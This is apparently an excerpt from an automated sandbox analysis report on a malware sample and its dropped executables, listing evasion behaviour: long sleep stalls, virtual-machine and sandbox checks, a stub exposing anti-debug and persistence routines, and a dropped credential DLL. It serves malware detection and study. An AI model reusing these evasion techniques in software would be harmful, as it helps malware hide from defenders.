                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeStalling execution: Execution stalls by calling Sleepgraph_15-22287
                                Source: CEE7.exe.3.dr, AAE1.exe.3.drBinary or memory string: SBIEDLL.DLL
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Windows\explorer.exe TID: 1780Thread sleep count: 646 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 3004Thread sleep count: 923 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 3004Thread sleep time: -92300s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 2236Thread sleep count: 959 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 2236Thread sleep time: -95900s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 3632Thread sleep count: 549 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 5136Thread sleep count: 816 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 5136Thread sleep time: -81600s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 1780Thread sleep count: 48 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 920Thread sleep count: 875 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 920Thread sleep time: -87500s >= -30000sJump to behavior
                                Source: C:\Windows\explorer.exe TID: 3632Thread sleep count: 53 > 30Jump to behavior
                                Source: C:\Windows\explorer.exe TID: 3632Thread sleep time: -31800s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe TID: 5348Thread sleep count: 90 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe TID: 5348Thread sleep time: -2700000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe TID: 488Thread sleep time: -50000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe TID: 3332Thread sleep time: -2160000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe TID: 5348Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe TID: 3332Thread sleep time: -180000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe TID: 4124Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe TID: 5036Thread sleep time: -50000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe TID: 4612Thread sleep time: -180000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe TID: 6072Thread sleep time: -720000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe TID: 4972Thread sleep count: 74 > 30
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe TID: 4972Thread sleep time: -2220000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe TID: 6192Thread sleep time: -50000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe TID: 6188Thread sleep time: -4320000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe TID: 4972Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exe TID: 5540Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exe TID: 5304Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\explorer.exeLast function: Thread delayed
                                Source: C:\Windows\explorer.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeThread delayed: delay time: 360000
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 646Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 923Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 959Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 549Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 816Jump to behavior
                                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 875Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeAPI coverage: 5.7 %
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeAPI coverage: 7.0 %
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\llpb1135.exeJump to dropped file
                                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3320.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dllJump to dropped file
                                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4477.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 50000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeThread delayed: delay time: 50000
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeThread delayed: delay time: 360000
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeThread delayed: delay time: 50000
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeThread delayed: delay time: 922337203685477
                                Source: explorer.exe, 00000003.00000000.443734059.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                                Source: explorer.exe, 00000003.00000000.397117261.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
                                Source: explorer.exe, 00000003.00000000.437904887.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                                Source: CEE7.exe.3.dr, AAE1.exe.3.drBinary or memory string: <Module>llpb1135a.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributellpb1135aEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks5lski3vr555.resources
                                Source: explorer.exe, 00000003.00000000.385855915.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                                Source: rundll32.exe, 0000001B.00000002.526156974.0000000000C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                                Source: explorer.exe, 00000003.00000000.421929448.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: AAE1.exe.3.drBinary or memory string: vmware
                                Source: explorer.exe, 00000003.00000000.399799654.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
                                Source: nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmp, nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: CEE7.exe.3.dr, AAE1.exe.3.drBinary or memory string: DetectVirtualMachine
                                Source: explorer.exe, 00000003.00000000.443734059.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
                                Source: explorer.exe, 00000003.00000000.445215208.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: 6267.exe, 0000000D.00000002.485553488.00000000015AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}z
                                Source: 6267.exe, 0000000D.00000002.485553488.00000000015AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001C4400 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,13_2_001C4400
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001DF909 FindFirstFileExW,13_2_001DF909
